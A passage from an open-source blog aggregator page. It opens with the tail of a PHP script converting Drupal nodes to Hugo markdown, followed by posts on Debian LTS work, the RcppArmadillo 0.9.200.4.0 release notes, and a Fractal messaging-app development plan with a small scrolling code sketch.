        $front_matter['categories'] = array_column($cat, 'name');
    }

    $path = drupal_get_path_alias('node/'.$node->nid);
    if ($path != 'node/'.$node->nid) {
        $front_matter['url'] = '/'.$path;
        $content_dir = explode('/', $path);
        $content_dir = end($content_dir);
    } else {
        $content_dir = $node->nid;
    }

    $content = json_encode(
        $front_matter,
        JSON_PRETTY_PRINT|JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE
    );
    $content .= "\n\n";

    $tmp_file = '/tmp/node.html';
    file_put_contents($tmp_file, $node->body['fr'][0]['value']);
    $body = shell_exec('html2markdown '.$tmp_file);
    unlink($tmp_file);
    //$body = $node->body['fr'][0]['value'];
    $content .= $body;

    $dir_name = '/tmp/hugo/content/'.$node->type.'/'.$content_dir;
    mkdir($dir_name, 0777, true);
    file_put_contents($dir_name.'/index.md', $content);
}

Ritesh Raj Sarraf rrs@researchut.com Debian Blog on RESEARCHUT

20181110-lts-201810

Planet Debian - Sht, 10/11/2018 - 9:47md
My LTS work in October

In October 2018 sadly I just managed to spend 1h working on jessie LTS on:

Today while writing this I also noticed that https://lists.debian.org/debian-lts-announce/2018/10/threads.html currently misses DLAs 1532 until DLA 1541, which I have just reported to the #debian-lists IRC channel and as #913426. Update: as that bug was closed quickly, I guess we instead need to focus on #859123 and #859122, so that DLAs are accessible to everyone in future.

Holger Levsen http://layer-acht.org/thinking/ Any sufficiently advanced thinking is indistinguishable from madness

RcppArmadillo 0.9.200.4.0

Planet Debian - Sht, 10/11/2018 - 9:01md

A new RcppArmadillo release, now at 0.9.200.4.0, based on the new Armadillo release 9.200.4 from earlier this week, is now on CRAN, and should get to Debian very soon.

Armadillo is a powerful and expressive C++ template library for linear algebra, aiming towards a good balance between speed and ease of use, with a syntax deliberately close to Matlab. RcppArmadillo integrates this library with the R environment and language, and is widely used by (currently) 532 (or 31 more since just the last release!) other packages on CRAN.

This release once again brings a number of improvements, see below for details.

Changes in RcppArmadillo version 0.9.200.4.0 (2018-11-09)
  • Upgraded to Armadillo release 9.200.4 (Carpe Noctem)

    • faster handling of symmetric positive definite matrices by rcond()

    • faster transpose of matrices with size ≥ 512x512

    • faster handling of compound sparse matrix expressions by accu(), diagmat(), trace()

    • faster handling of sparse matrices by join_rows()

    • expanded sign() to handle scalar arguments

    • expanded operators (*, %, +, −) to handle sparse matrices with differing element types (eg. multiplication of complex matrix by real matrix)

    • expanded conv_to() to allow conversion between sparse matrices with differing element types

    • expanded solve() to optionally allow keeping solutions of systems singular to working precision

    • workaround for gcc and clang bug in C++17 mode

  • Commented-out a sparse matrix test consistently failing on the fedora-clang machine at CRAN, and only there. No fix without access.

  • The 'Unit test' vignette is no longer included.

Courtesy of CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Dirk Eddelbuettel http://dirk.eddelbuettel.com/blog Thinking inside the box

Julian Sparber: Purism Fractal sponsorship

Planet GNOME - Sht, 10/11/2018 - 11:08pd

I’m happy to announce that Purism agreed to sponsor my work on Fractal for the next couple of weeks. I will polish the room history and drastically improve the UX/UI around scrolling, loading messages, etc., which will make Fractal feel much nicer. As part of this I will also clean up and refactor the current code. On my agenda is the following:

Smooth history loading

Loading old messages in the history is currently a bit jarring, because the scroll position isn’t preserved when new messages come in. I’d like to address this by loading messages outside the viewport, making it so that the user isn’t even aware that more messages are being loaded most of the time. This is a crucial part of why modern messaging apps feel so nice.
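Fractal itself is written in Rust on top of GTK, so the following is only a language-agnostic sketch (in C++/gtkmm, with a made-up function name) of the general scroll-preservation trick: record the adjustment before prepending older items, then shift the scroll value by however much the content grew.

#include <gtkmm.h>
#include <functional>

// Sketch only: when older messages are prepended above the viewport, grow the
// scroll value by the same amount the content grew, so the visible messages
// do not appear to jump. In real code you would wait for the adjustment's
// "changed" signal instead of reading the new upper bound immediately.
void prepend_preserving_scroll(Gtk::ScrolledWindow& window,
                               const std::function<void()>& prepend_items)
{
    auto adj = window.get_vadjustment();
    const double old_value = adj->get_value();
    const double old_upper = adj->get_upper();

    prepend_items();  // insert the older messages at the top of the list

    const double new_upper = adj->get_upper();
    adj->set_value(old_value + (new_upper - old_upper));
}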

Faster message rendering

There are some inefficiencies in how messages are currently rendered, which make showing messages not as smooth as it could be. Fixing this could improve the experience of sending/receiving messages significantly.

 “New messages” behavior
  • Re-add a “New messages” divider, since it was lost as part of the big history refactor I recently completed
  • Scroll to last seen message when opening app instead of most recent message
  • Fix bugs in current behavior and make sure the divider always shows up
Add day label

Add a label with the day/date at the beginning of every new day, like other messaging apps do.
